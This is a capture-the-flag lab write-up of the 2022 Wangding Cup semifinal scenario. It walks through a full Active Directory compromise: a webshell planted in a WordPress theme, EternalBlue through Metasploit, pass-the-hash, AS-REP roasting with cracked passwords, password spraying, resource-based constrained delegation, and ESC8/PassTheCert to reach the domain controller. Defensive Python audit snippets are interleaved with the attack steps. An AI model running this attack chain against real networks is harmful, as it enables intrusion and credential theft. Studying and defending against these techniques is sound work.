春秋云镜: 2022 网鼎杯 semifinal review


flag1

fscan finds nothing.

Clicking around, the site turns out to be WordPress.

Run wpscan:

wpscan --url http://39.99.133.128/ --disable-tls-checks --stealthy

Nothing there either; wpscan is useless here.

WordPress default admin path: http://39.99.133.128/wp-login.php

Log in with admin/123456.

The dashboard shows the site uses the Twenty Twenty-One theme.

Pick any theme file and write a webshell into it.

Path of the theme file: http://39.99.133.128/wp-content/themes/twentytwentyone/search.php

whoami shows we only have www privileges.

flag01: flag{660deffe-63b7-4bbd-8a72-f48143ab2f64}

flag2

Internal IP: 172.22.15.26

Upload fscan to scan the internal network. Something seems wrong with the webshell: no output?

./fscan -h 172.22.15.24

Scanning a single host does return results, so it is either a timeout or the output is too large and overflows; adjust the timeout.

If that still fails, the only option is to bring up a different shell.

Here I bring up vshell. Note that vshell has to be launched stageless: the command-based loader needs a port that supports both HTTP and TCP at the same time. Catch the shell.

fscan the internal network:

172.22.15.26 this host
172.22.15.24 Windows Server 2008, has MS17-010
172.22.15.13 DC01
172.22.15.35 XR-0687, Windows Server 2016
172.22.15.18 XR-CA, and the active-directory-certsrv-detect POC fires

Set up a proxy first:

gost -L socks5://:5555?bind=true

gost -L rtcp://:2222/39.101.175.156:22 -F socks5://39.101.175.156:5555

Hit 172.22.15.24 with EternalBlue. For EternalBlue the usual recommendation is to go straight to msf (I prefer the Windows msf):

msfconsole
use exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/meterpreter/bind_tcp_uuid
set RHOSTS 172.22.15.24
exploit

Domain users:

flag02: flag{4b959ad6-6979-4a98-a5d2-d973bf59c02b}

flag3

hashdump fails with [-] priv_passwd_get_sam_hashes: Operation failed: Access is denied.

According to the issue https://github.com/rapid7/metasploit-framework/issues/15123,

the msf session needs to be migrated into an x64 process.

Tried migrating into lsass or svchost, and got more odd errors.

sysinfo shows that the x64 payload I used came up as x86 😡

So the Windows msf is flaky after all; Linux msf it is. Windows is a real pain here; swapping through the various bind_tcp payloads didn't help either.

First, copy the hashdump result:

meterpreter > hashdump
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
Administrator:500:aad3b435b51404eeaad3b435b51404ee:0e52d03e9b939997401466a0ec5a9cbc:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

Pass the hash:

python psexec.py administrator@172.22.15.24 -hashes :0e52d03e9b939997401466a0ec5a9cbc -codec gbk

Add a user:

net user godown qwer1234! /add
net localgroup administrators godown /add

RDP in.

Save the following as a .reg file and run it as administrator:

Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\CredSSP\Parameters]
"AllowEncryptionOracle"=dword:00000002
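The .reg file above sets the CredSSP encryption-oracle remediation (CVE-2018-0886) to 2, "Vulnerable", on the client so that it will talk RDP to an unpatched server. From a defender's side that value is exactly what an endpoint audit should flag. The following Python is an added example, not part of the original write-up: it parses .reg exports, reports the AllowEncryptionOracle level (0 = Force Updated Clients, 1 = Mitigated, 2 = Vulnerable) and rewrites a vulnerable export to the Mitigated setting. The key path and the three level names are the real Windows ones; the sample export is the one from the write-up.

```python
"""Audit a Windows .reg export for the CredSSP encryption-oracle setting.

Added example (not from the original write-up). The CVE-2018-0886 remediation
is controlled by AllowEncryptionOracle under the CredSSP\Parameters policy key:
0 = Force Updated Clients, 1 = Mitigated (post-patch default), 2 = Vulnerable.
"""
import re

CREDSSP_KEY = (r"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion"
               r"\Policies\System\CredSSP\Parameters")
ORACLE_LEVELS = {0: "Force Updated Clients", 1: "Mitigated", 2: "Vulnerable"}

# The .reg content used in the write-up, verbatim.
REG_VULNERABLE = r"""Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\CredSSP\Parameters]
"AllowEncryptionOracle"=dword:00000002
"""

_VALUE_RE = re.compile(r'"([^"]+)"=(?:dword:([0-9a-fA-F]{8})|"(.*)")$')


def parse_reg(text):
    """Return {key_path_lowercased: {value_name: value}} for dword and string values."""
    result, current = {}, None
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("Windows Registry Editor") or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].lower()          # registry paths are case-insensitive
            result.setdefault(current, {})
            continue
        m = _VALUE_RE.match(line)
        if m and current is not None:
            name, dword, string = m.groups()
            result[current][name] = int(dword, 16) if dword is not None else string
    return result


def credssp_oracle_level(text):
    """Return (level, name) for AllowEncryptionOracle, or None if the export does not set it."""
    params = parse_reg(text).get(CREDSSP_KEY.lower(), {})
    if "AllowEncryptionOracle" not in params:
        return None
    level = params["AllowEncryptionOracle"]
    return level, ORACLE_LEVELS.get(level, "unknown")


def harden(text):
    """Rewrite the export so AllowEncryptionOracle is 1 (Mitigated); 0 is stricter still."""
    return re.sub(r'("AllowEncryptionOracle"=dword:)[0-9a-fA-F]{8}', r"\g<1>00000001", text)


if __name__ == "__main__":
    print("as written:", credssp_oracle_level(REG_VULNERABLE))
    print("hardened:  ", credssp_oracle_level(harden(REG_VULNERABLE)))
```

Importing the policy as 2 re-opens the downgrade on every RDP client that reads it, so an audit of exported policy or of the live key should treat anything other than 0 or 1 as a finding.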

Log in again.

Run phpstudy from the desktop directly and the database credentials are shown.

The web root is phpMyAdmin.

You could dig through the local db files for sensitive data, but with phpMyAdmin and the credentials available, just log in:

http://172.22.15.24/phpMyadmin/

root/root@#123

The zdoosys_user table holds a pile of user/password pairs.

Export them and spray them against the domain. This is the same Kerberoasting attack used in Certify; if unfamiliar, see

https://godownio.github.io/2025/10/18/chun-qiu-yun-jing-certify/

python GetNPUsers.py xiaorang.lab/ -dc-ip 172.22.15.13 -usersfile user.txt -request -outputfile hash.txt

D:\tools\impacket-0.12.0\impacket-0.12.0\examples\GetNPUsers.py:165: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
now = datetime.datetime.utcnow() + datetime.timedelta(days=1)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
$krb5asrep$23$lixiuying@XIAORANG.LAB:476409ffba0decf3290d18197eacc57c$541ddacf2b1c1ab44bf8c9bef60a541db5aa84200195053527d22e922fa5f7bedb215d9951d4dae64d4c37650748fce7d95b0b900b4d33eff8563f12e4aacbead3ef1c702a35c5b112c6a60047f344ce66ef11c8dc6e1c622378557c0da3ac2b66d4c5c5a9240e97cbff4eabbbf9f71a332d05e5214f3e44cf1b7ee64fef9ea4845a470458c60ef268d806ded764f5640b7df4c673c716747db08c46289413d8190fe7f89841f4a05b2abf210bfc1254501df5194e898d141eb292ec1b89a8ef02c949ac298c906d9bd3b058077786fd535ac35017b37b4c6992968dc0b7ffcd03766e585015ce0c1c880ead
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
$krb5asrep$23$huachunmei@XIAORANG.LAB:71e63db3b9074a65b02140fef43035ed$c521d4e2573ae20947a037980fe3fe46393ccd9c141401c3e73c51b1f005903cc1698117355e3b4bd6f5e307397eff54b96042677e71f1a38ec0b1c59fa794cbb8875c807afcbc75c090acef73c369a528c4a97c62d0f7fb135db1b34a16202093a314659a19c95ed96e73b46af2a4fd978e418f6b3ead6acb267f11e70a5b41389651585b25069e054d75a6226c2bacf1dcc1c64908561431105373450fa42f04edcd86dd105f444eb0b22f8322bba52f9a300176a19e7522a3e882da8b5f9dd3b13ee9ab2195aa71e01daf04d5e8619118e3389705ac23cfb00767ffdfdd0c50cf7a7840b144051543e137
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] User lihongxia doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User wangyulan doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User chenjianhua doesn't have UF_DONT_REQUIRE_PREAUTH set
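What GetNPUsers does above is AS-REP roasting: every `$krb5asrep$` line means the KDC returned an AS-REP for an account that has "Do not require Kerberos preauthentication" set (UF_DONT_REQUIRE_PREAUTH, 0x400000 in userAccountControl), and the `[-] User ... doesn't have UF_DONT_REQUIRE_PREAUTH set` lines are the accounts that are safe. The remediation is to clear that flag and, where a hash may have been captured, rotate the password. The Python below is an added example, not part of the write-up: it triages tool output of this shape into roastable, protected and unknown accounts, splits a `$krb5asrep$` line into its fields, and checks a raw userAccountControl value for the bit. The sample output is constructed from the lines above with the hash bodies shortened.

```python
"""Audit GetNPUsers-style output for accounts with Kerberos pre-authentication disabled.

Added example, not part of the original write-up. A '$krb5asrep$<etype>$<user>@<REALM>:
<checksum>$<encdata>' line (hashcat mode 18200 for etype 23) means the account has
UF_DONT_REQUIRE_PREAUTH set and should be fixed. Hash bodies below are shortened,
constructed values shaped like the tool output.
"""
import re

UF_DONT_REQUIRE_PREAUTH = 0x400000

# Constructed sample modelled on the output in the write-up (hash bodies truncated).
SAMPLE_OUTPUT = """\
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
$krb5asrep$23$lixiuying@XIAORANG.LAB:476409ffba0decf3290d18197eacc57c$541ddacf2b1c1ab4
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
$krb5asrep$23$huachunmei@XIAORANG.LAB:71e63db3b9074a65b02140fef43035ed$c521d4e2573ae209
[-] User lihongxia doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User wangyulan doesn't have UF_DONT_REQUIRE_PREAUTH set
"""

ASREP_RE = re.compile(r"^\$krb5asrep\$(\d+)\$([^@]+)@([^:]+):([0-9a-f]+)\$([0-9a-f]+)$")
NOPREAUTH_RE = re.compile(r"^\[-\] User (\S+) doesn't have UF_DONT_REQUIRE_PREAUTH set$")


def parse_asrep(line):
    """Split an AS-REP hash line into its fields; None if the line is not one."""
    m = ASREP_RE.match(line.strip())
    if not m:
        return None
    etype, user, realm, checksum, edata = m.groups()
    return {"etype": int(etype), "user": user, "realm": realm,
            "checksum": checksum, "edata": edata}


def triage(output):
    """Return (accounts with pre-auth disabled, accounts requiring it, count of unknown principals)."""
    roastable, protected, unknown = [], [], 0
    for line in output.splitlines():
        rec = parse_asrep(line)
        if rec:
            roastable.append(rec["user"])      # this account must have the flag cleared
            continue
        m = NOPREAUTH_RE.match(line.strip())
        if m:
            protected.append(m.group(1))
        elif "KDC_ERR_C_PRINCIPAL_UNKNOWN" in line:
            unknown += 1                       # name in the wordlist does not exist in AD
    return roastable, protected, unknown


def needs_preauth_fix(user_account_control):
    """True if a userAccountControl value has the DONT_REQUIRE_PREAUTH bit set."""
    return bool(user_account_control & UF_DONT_REQUIRE_PREAUTH)


if __name__ == "__main__":
    roastable, protected, unknown = triage(SAMPLE_OUTPUT)
    print("fix these accounts:", roastable)
    print("already protected:", protected, "| unknown names:", unknown)
```

The same bit test can be run straight against an LDAP export of userAccountControl, which finds the exposure without touching the KDC at all; the output parser is for checking what a tool run actually returned.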

That yields two TGT tickets; run them through hashcat to recover the plaintext:

hashcat TGT.txt /usr/share/wordlists/rockyou.txt

lixiuying@xiaorang.lab   winniethepooh
huachunmei@xiaorang.lab 1qaz2wsx

Spray the passwords across the domain:

proxychains4 crackmapexec rdp 172.22.15.18 172.22.15.13 172.22.15.35 -d xiaorang.lab -u huachunmei -p '1qaz2wsx'
proxychains4 crackmapexec rdp 172.22.15.18 172.22.15.13 172.22.15.35 -d xiaorang.lab -u lixiuying -p 'winniethepooh'

(Couldn't be bothered to fire up Kali.)

The spray shows both users can log in to the .35 machine.

After connecting to .35, run SharpHound.

It shows .35 has GenericWrite over the domain controller, so it's RBCD or DCSync again; pick one.

Upload https://github.com/shigophilo/tools/blob/master/PowerView.ps1

Type powershell in cmd and it can be imported.

Actually PowerView isn't needed at all; I have summarized this before:

python addcomputer.py xiaorang.lab/lixiuying:winniethepooh -dc-ip 172.22.15.13 -dc-host xiaorang.lab -computer-name TEST$ -computer-pass P@ssw0rd

python rbcd.py xiaorang.lab/lixiuying:winniethepooh -dc-ip 172.22.15.13 -action write -delegate-to XR-0687$ -delegate-from TEST$

python getST.py xiaorang.lab/TEST$:P@ssw0rd -spn cifs/XR-0687.xiaorang.lab -impersonate Administrator -dc-ip 172.22.15.13

image-20251024173133910

Log in with the saved cache:

set KRB5CCNAME=Administrator@cifs_XR-0687.xiaorang.lab@XIAORANG.LAB.ccache
python psexec.py Administrator@XR-0687.xiaorang.lab -k -no-pass -dc-ip 172.22.15.13
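What rbcd.py wrote to XR-0687$ above is the msDS-AllowedToActOnBehalfOfOtherIdentity attribute: a self-relative SECURITY_DESCRIPTOR whose DACL carries one ACCESS_ALLOWED_ACE per principal allowed to act on behalf of other identities. The blind spot for defenders is that this attribute is rarely read, so a periodic sweep of every computer object that decodes it and alerts on any SID that is not on an allow-list catches both this step and the passthecert variant later in the write-up. The Python below is an added example, not the project's or the author's code: it constructs a descriptor in the layout AD stores (owner/group set to BUILTIN\Administrators, ACL revision 4, the 0xF01FF full-control mask that impacket's rbcd.py uses) and then parses it back to the SID strings. The domain SID and RID used for the sample are made up.

```python
"""Decode msDS-AllowedToActOnBehalfOfOtherIdentity to see who may delegate to a computer.

Added example, not part of the original write-up. Builds a self-relative security
descriptor in the same binary layout AD stores for this attribute, then parses it
back to SID strings so a sweep can compare them against an allow-list. The sample
domain SID and RID are constructed.
"""
import struct

ACCESS_ALLOWED_ACE_TYPE = 0x00
ACL_REVISION_DS = 4
SE_DACL_PRESENT = 0x0004
SE_SELF_RELATIVE = 0x8000
FULL_CONTROL_MASK = 0x000F01FF   # mask written by impacket's rbcd.py


def build_sid(sub_authorities, authority=5):
    """Pack S-1-<authority>-<sub...> into binary SID form (6-byte big-endian authority)."""
    return (struct.pack("<BB", 1, len(sub_authorities)) + authority.to_bytes(6, "big")
            + b"".join(struct.pack("<I", s) for s in sub_authorities))


def sid_to_str(data, offset):
    """Unpack a binary SID at offset; return (string form, byte length)."""
    rev, count = struct.unpack_from("<BB", data, offset)
    auth = int.from_bytes(data[offset + 2:offset + 8], "big")
    subs = struct.unpack_from("<%dI" % count, data, offset + 8)
    return "S-%d-%d-%s" % (rev, auth, "-".join(str(s) for s in subs)), 8 + 4 * count


def build_rbcd_descriptor(allowed_sids):
    """Construct the descriptor: owner/group BUILTIN\\Administrators, DACL of allow ACEs."""
    ba = build_sid([32, 544])                                  # S-1-5-32-544
    aces = b""
    for sid in allowed_sids:
        body = struct.pack("<I", FULL_CONTROL_MASK) + sid      # ACE mask then SID
        aces += struct.pack("<BBH", ACCESS_ALLOWED_ACE_TYPE, 0, 4 + len(body)) + body
    acl = struct.pack("<BBHHH", ACL_REVISION_DS, 0, 8 + len(aces), len(allowed_sids), 0) + aces
    owner_off = 20                                             # header is 20 bytes
    group_off = owner_off + len(ba)
    dacl_off = group_off + len(ba)
    header = struct.pack("<BBHIIII", 1, 0, SE_SELF_RELATIVE | SE_DACL_PRESENT,
                         owner_off, group_off, 0, dacl_off)
    return header + ba + ba + acl


def allowed_to_act(sd):
    """Return the SID strings granted in the descriptor's DACL (empty if no DACL)."""
    _rev, _sbz, control, _owner, _group, _sacl, dacl_off = struct.unpack_from("<BBHIIII", sd, 0)
    if not (control & SE_DACL_PRESENT) or dacl_off == 0:
        return []
    _acl_rev, _sbz2, _acl_size, ace_count, _sbz3 = struct.unpack_from("<BBHHH", sd, dacl_off)
    sids, pos = [], dacl_off + 8
    for _ in range(ace_count):
        ace_type, _flags, ace_size = struct.unpack_from("<BBH", sd, pos)
        if ace_type == ACCESS_ALLOWED_ACE_TYPE:
            sid, _ = sid_to_str(sd, pos + 8)                   # skip ACE header (4) + mask (4)
            sids.append(sid)
        pos += ace_size
    return sids


def unexpected_delegators(sd, allowlist=()):
    """SIDs present in the descriptor that are not on the allow-list: these are findings."""
    return [s for s in allowed_to_act(sd) if s not in set(allowlist)]


# Constructed sample: a freshly added machine account (made-up domain SID, RID 1105).
TEST_SID = build_sid([21, 1111111111, 2222222222, 3333333333, 1105])

if __name__ == "__main__":
    sd = build_rbcd_descriptor([TEST_SID])
    print("allowed to act on behalf:", allowed_to_act(sd))
    print("not on allow-list:", unexpected_delegators(sd, allowlist=[]))
```

Feed the raw attribute bytes from an LDAP query into `allowed_to_act` and any computer object whose list is non-empty deserves a look; on most estates the expected value is simply empty, which makes this one of the cheaper high-signal checks in a domain.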

Add a hosts entry.

flag03: flag{7b8a442b-5249-4dd1-ae03-84e022f1d72a}

flag4

The last flag was supposed to be a certipy certificate-template attack, but it errors with KDC_ERR_PADATA_TYPE_NOSUPP.

First look for vulnerable certificate templates:

certipy find -u lixiuying@xiaorang.lab -p winniethepooh -dc-ip 172.22.15.13 -vulnerable -stdout

[!] Vulnerabilities
ESC8 : Web Enrollment is enabled over HTTP.

Attack ESC8. Add a machine account:

certipy account create -user TEST2$ -pass P@ssw0rd -dns XR-DC01.xiaorang.lab -dc-ip 172.22.15.13 -u lixiuying -p winniethepooh

Request a certificate from the template:

certipy req -u TEST2$@xiaorang.lab -p P@ssw0rd -ca xiaorang-XR-CA-CA -target 172.22.15.18 -template Machine -dns XR-DC01.xiaorang.lab

The certificate is saved as xr-dc01.pfx.

The next step is to authenticate with the certificate, but the challenge itself has a problem and errors out, so certipy auth -pfx can't be used directly.

This problem can occur when the domain controller has no certificate installed for smart-card authentication (for example one from the "Domain Controller" or "Domain Controller Authentication" template), when the user's password has expired, or when a wrong password was supplied.

In that situation the certificate obtained cannot be used to get a TGT or an NTLM hash.

AD supports certificate authentication over two protocols by default: Kerberos PKINIT and Schannel.

So try Schannel: pass the certificate to LDAPS via Schannel, modify LDAP configuration (for example set up RBCD / DCSync), and thereby gain domain controller privileges.

Secure Channel (Schannel) is the SSP Windows uses when establishing TLS/SSL connections. By default, not many protocols in an AD environment support AD authentication through Schannel out of the box. WinRM, RDP and IIS all support client authentication via Schannel, but it requires extra configuration and in some cases (WinRM, for instance) is not integrated with Active Directory. Another protocol that usually works is LDAPS (LDAP over SSL/TLS). In fact, the AD Technical Specification (MS-ADTS) shows that client certificate authentication can even be performed directly against LDAPS.

https://whoamianony.top/posts/pass-the-certificate-when-pkinit-is-nosupp/

Download https://github.com/AlmondOffSec/PassTheCert/blob/main/Python/passthecert.py

openssl pkcs12 -in xr-dc01.pfx -nodes -out test.pem
openssl rsa -in test.pem -out test.key
openssl x509 -in test.pem -out test.crt

image-20251024181248721

Pass the certificate:

python passthecert.py -action write_rbcd -crt test.crt -key test.key -domain xiaorang.lab -dc-ip 172.22.15.13 -delegate-to XR-DC01$ -delegate-from TEST$

When this POC runs, it authenticates to LDAPS with the supplied certificate, creates a new machine account, and sets the msDS-AllowedToActOnBehalfOfOtherIdentity attribute on the specified machine account to carry out a resource-based constrained delegation (RBCD) attack. In effect it creates a new machine account and performs RBCD with it.

Since the new account already has RBCD in place, request the ST again and use the new account to dump the domain controller's TGT:

python getST.py xiaorang.lab/TEST$:P@ssw0rd -spn cifs/XR-DC01.xiaorang.lab -impersonate Administrator -dc-ip 172.22.15.13
set KRB5CCNAME=Administrator@cifs_XR-DC01.xiaorang.lab@XIAORANG.LAB.ccache
python psexec.py Administrator@XR-DC01.xiaorang.lab -k -no-pass -dc-ip 172.22.15.13

hosts entry:

172.22.15.13 XR-DC01.xiaorang.lab

flag04: flag{134d5b4e-56be-4ef8-9d12-8f9870b821be}
